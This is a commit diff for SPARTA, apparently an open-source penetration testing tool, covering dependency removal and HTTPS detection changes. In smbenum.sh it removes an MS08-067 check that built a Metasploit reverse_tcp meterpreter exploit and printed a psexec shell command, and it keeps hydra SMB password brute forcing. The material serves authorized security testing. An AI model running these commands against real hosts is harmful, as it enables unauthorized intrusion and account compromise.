Removed QtWebKit dependency (closes #94). Improved HTTPS/HTTP detection (closes #90). Removed check for ms08-067 from smbenum.sh
root
5 years ago
19 | 19 | |
20 | 20 | SPARTA 1.0.3 (BETA) |
21 | 21 | * fixed the QtWebKit import error (thx alexxn) |
22 | * fixed ms08-067_check import issue (thx chris948)⏎ | |
22 | * fixed ms08-067_check import issue (thx chris948) | |
23 | ||
24 | SPARTA 1.0.4 (BETA) | |
25 | * removed QtWebKit dependency for displaying the help menu | |
26 | * improved HTTPS/HTTP detection (experimental) | |
27 | * removed MS08-067 check from smbenum.sh |
1 | 1 | |
2 | 2 | ''' |
3 | 3 | SPARTA - Network Infrastructure Penetration Testing Tool (http://sparta.secforce.com) |
4 | Copyright (c) 2015 SECFORCE (Antonio Quina and Leonidas Stavliotis) | |
4 | Copyright (c) 2019 SECFORCE (Antonio Quina and Leonidas Stavliotis) | |
5 | 5 | |
6 | 6 | This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. |
7 | 7 | |
10 | 10 | You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. |
11 | 11 | ''' |
12 | 12 | |
13 | import os, sys, urllib2, socket, time, datetime, locale, webbrowser, re # for webrequests, screenshot timeouts, timestamps, browser stuff and regex | |
13 | import os, sys, urllib2, socket, time, datetime, locale, webbrowser, re, requests # for webrequests, screenshot timeouts, timestamps, browser stuff and regex | |
14 | 14 | from PyQt4 import QtGui, QtCore |
15 | 15 | from PyQt4.QtCore import * # for QProcess |
16 | import errno # temporary for isHttpd | |
16 | #import errno # temporary for isHttpd | |
17 | 17 | import subprocess # for screenshots with cutycapt |
18 | 18 | import string # for input validation |
19 | 19 | |
38 | 38 | res = (16777216 * o[0]) + (65536 * o[1]) + (256 * o[2]) + o[3] |
39 | 39 | return res |
40 | 40 | |
41 | # old function, replaced by isHttps (checking for https first is better) | |
42 | def isHttp(url): | |
41 | # checks if a web port is SSL enabled | |
42 | def isHttps(ip, port): | |
43 | headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0'} | |
43 | 44 | try: |
44 | req = urllib2.Request(url) | |
45 | req.add_header('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0') | |
46 | r = urllib2.urlopen(req, timeout=10) | |
47 | #print 'response code: ' + str(r.code) | |
48 | #print 'response content: ' + str(r.read()) | |
49 | return True | |
50 | ||
51 | except urllib2.HTTPError, e: | |
52 | reason = str(sys.exc_info()[1].reason) | |
53 | # print reason | |
54 | if reason == 'Unauthorized' or reason == 'Forbidden': | |
55 | return True | |
45 | r = requests.get("https://"+ip+":"+port, headers=headers, verify=False, timeout=5) | |
46 | return True | |
47 | ||
48 | except requests.exceptions.SSLError as e: | |
56 | 49 | return False |
57 | ||
58 | except: | |
50 | ||
51 | except requests.exceptions.ConnectionError as e: | |
52 | return False | |
53 | ||
54 | except requests.exceptions.ReadTimeout as e: | |
59 | 55 | return False |
60 | ||
61 | def isHttps(ip, port): | |
62 | try: | |
63 | req = urllib2.Request('https://'+ip+':'+port) | |
64 | req.add_header('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0') | |
65 | r = urllib2.urlopen(req, timeout=5) | |
66 | # print '\nresponse code: ' + str(r.code) | |
67 | # print '\nresponse content: ' + str(r.read()) | |
68 | return True | |
69 | ||
70 | except: | |
71 | reason = str(sys.exc_info()[1].reason) | |
72 | # print reason | |
73 | # if 'Interrupted system call' in reason: | |
74 | # print 'caught exception. retry?' | |
75 | ||
76 | if reason == 'Forbidden': | |
77 | return True | |
78 | return False | |
79 | ||
80 | ||
56 | ||
57 | except Exception as e: | |
58 | print e | |
59 | return True | |
60 | ||
81 | 61 | def getTimestamp(human=False): |
82 | 62 | t = time.time() |
83 | 63 | if human: |
276 | 256 | else: |
277 | 257 | self.save("http://"+url, ip, port, outputfile) |
278 | 258 | |
279 | except: | |
259 | except Exception as e: | |
280 | 260 | print '\t[-] Unable to take the screenshot. Moving on..' |
261 | print e | |
281 | 262 | continue |
282 | 263 | |
283 | 264 | self.processing = False |
21 | 21 | |
22 | 22 | # initialisations that will happen once - when the program is launched |
23 | 23 | def __init__(self, view, logic): |
24 | self.version = 'SPARTA 1.0.3 (BETA)' # update this everytime you commit! | |
24 | self.version = 'SPARTA 1.0.4 (BETA)' # update this everytime you commit! | |
25 | 25 | self.logic = logic |
26 | 26 | self.view = view |
27 | 27 | self.view.setController(self) |
43 | 43 | echo -e "\n########## Enumerating shares ##########" |
44 | 44 | nmap -Pn -T4 -sS -p139,445 --script=smb-enum-shares $IP |
45 | 45 | |
46 | #echo -e "\n########## Checking for common vulnerabilities ##########" | |
47 | #nmap -Pn -T4 -sS -p139,445 --script=smb-check-vulns $IP | |
48 | #nmap -Pn -T4 -sS -p139,445 --script=smb-check-vulns --script-args=unsafe=1 $IP | |
49 | #echo -e "\nChecking for MS08-067 with metasploit. It could take a while.." | |
50 | #vulnerable=`msfcli exploits/windows/smb/ms08_067_netapi RHOST=$IP C` | |
51 | echo -e "\nChecking for MS08-067.." | |
52 | vulnerable=`python ./scripts/ms08-067_check.py -t $IP -s` | |
53 | echo $vulnerable | |
46 | echo -e "\n########## Bruteforcing all users with 'password', blank and username as password" | |
47 | hydra -e ns -L /tmp/$IP-users.txt -p password $IP smb -t 1 | |
48 | rm /tmp/$IP-users.txt | |
54 | 49 | |
55 | #if [[ $vulnerable == *"The target is vulnerable"* ]] | |
56 | if [[ $vulnerable == *"VULNERABLE"* ]] | |
57 | then | |
58 | echo "Oh yeah! The target is vulnerable!" | |
59 | MYIP=$(ifconfig $IFACE | awk -F'[: ]+' '/inet addr:/ {print $4}') | |
60 | echo "use exploits/windows/smb/ms08_067_netapi" > /tmp/$IP-netapi.rc | |
61 | echo "set payload windows/meterpreter/reverse_tcp" >> /tmp/$IP-netapi.rc | |
62 | echo "set RHOST $IP" >> /tmp/$IP-netapi.rc | |
63 | echo "set LHOST $MYIP" >> /tmp/$IP-netapi.rc | |
64 | echo "set LPORT 443" >> /tmp/$IP-netapi.rc | |
65 | echo "set ExitOnSession false" >> /tmp/$IP-netapi.rc | |
66 | echo "exploit -j" >> /tmp/$IP-netapi.rc | |
67 | ||
68 | echo -e "\nTo exploit this host now use:" | |
69 | echo -e "msfconsole -r /tmp/$IP-netapi.rc" | |
70 | else | |
71 | echo "The target is NOT vulnerable!" | |
72 | echo -e "\n########## Bruteforcing all users with 'password', blank and username as password" | |
73 | hydra -e ns -L /tmp/$IP-users.txt -p password $IP smb -t 1 | |
74 | rm /tmp/$IP-users.txt | |
75 | ||
76 | echo -e "\n\nTo get a shell use:" | |
77 | echo -e "/usr/local/bin/psexec.py <user>:<password>@$IP cmd.exe\n" | |
78 | fi |
1 | 1 | |
2 | 2 | ''' |
3 | 3 | SPARTA - Network Infrastructure Penetration Testing Tool (http://sparta.secforce.com) |
4 | Copyright (c) 2018 SECFORCE (Antonio Quina and Leonidas Stavliotis) | |
4 | Copyright (c) 2019 SECFORCE (Antonio Quina and Leonidas Stavliotis) | |
5 | 5 | |
6 | 6 | This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. |
7 | 7 | |
25 | 25 | print e |
26 | 26 | exit(1) |
27 | 27 | |
28 | try: | |
29 | from PyQt4 import QtWebKit | |
30 | except ImportError, e: | |
31 | try: | |
32 | from PySide import QtWebKit | |
33 | except ImportError: | |
34 | print "[-] Import failed. QtWebKit library not found. \nTry installing it with: apt install python-pyside.qtwebkit" | |
35 | exit(1) | |
36 | ||
37 | 28 | from app.logic import * |
38 | 29 | from ui.gui import * |
39 | 30 | from ui.view import * |
1 | 1 | |
2 | 2 | ''' |
3 | 3 | SPARTA - Network Infrastructure Penetration Testing Tool (http://sparta.secforce.com) |
4 | Copyright (c) 2015 SECFORCE (Antonio Quina and Leonidas Stavliotis) | |
4 | Copyright (c) 2019 SECFORCE (Antonio Quina and Leonidas Stavliotis) | |
5 | 5 | |
6 | 6 | This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. |
7 | 7 | |
16 | 16 | from PyQt4.QtCore import * # for filters dialog |
17 | 17 | except ImportError: |
18 | 18 | print "[-] Import failed. PyQt4 library not found. \nTry installing it with: apt install python-qt4" |
19 | ||
20 | try: | |
21 | usePySide = False | |
22 | from PyQt4 import QtWebKit | |
23 | except ImportError, e: | |
24 | try: | |
25 | from PySide import QtWebKit | |
26 | usePySide = True | |
27 | except ImportError, e: | |
28 | print "[-] Import failed. QtWebKit library not found. \nTry installing it with: apt install python-pyside.qtwebkit" | |
29 | exit(1) | |
30 | 19 | |
31 | 20 | from ui.gui import * |
32 | 21 | from ui.dialogs import * |
37 | 26 | from app.processmodels import * |
38 | 27 | from app.auxiliary import * |
39 | 28 | import time #temp |
29 | import webbrowser # to open help page in browser | |
40 | 30 | |
41 | 31 | # this class handles everything gui-related |
42 | 32 | class View(QtCore.QObject): |
62 | 52 | self.importProgressWidget = ProgressWidget('Importing nmap..', self.ui.centralwidget) |
63 | 53 | self.adddialog = AddHostsDialog(self.ui.centralwidget) |
64 | 54 | self.settingsWidget = AddSettingsDialog(self.ui.centralwidget) |
65 | self.helpWidget = QtWebKit.QWebView() | |
66 | self.helpWidget.setWindowTitle('SPARTA Help') | |
67 | 55 | |
68 | 56 | # kali moves the help file so let's find it |
69 | url = './doc/help.html' | |
70 | if not os.path.exists(url): | |
71 | url = '/usr/share/doc/sparta/help.html' | |
72 | ||
73 | if usePySide: | |
74 | self.helpWidget.load(url) | |
75 | else: | |
76 | self.helpWidget.load(QUrl(url)) | |
77 | ||
57 | self.helpurl = './doc/help.html' | |
58 | if not os.path.exists(self.helpurl): | |
59 | self.helpurl = '/usr/share/doc/sparta/help.html' | |
60 | ||
78 | 61 | self.ui.HostsTableView.setSelectionMode(1) # disable multiple selection |
79 | 62 | self.ui.ServiceNamesTableView.setSelectionMode(1) |
80 | 63 | self.ui.ToolsTableView.setSelectionMode(1) |
449 | 432 | self.controller.cancelSettings() |
450 | 433 | |
451 | 434 | def connectHelp(self): |
452 | self.ui.menuHelp.triggered.connect(self.helpWidget.show) | |
435 | self.ui.menuHelp.triggered.connect(self.showHelp) | |
436 | ||
437 | def showHelp(self): | |
438 | webbrowser.open(self.helpurl) | |
453 | 439 | |
454 | 440 | ### |
455 | 441 |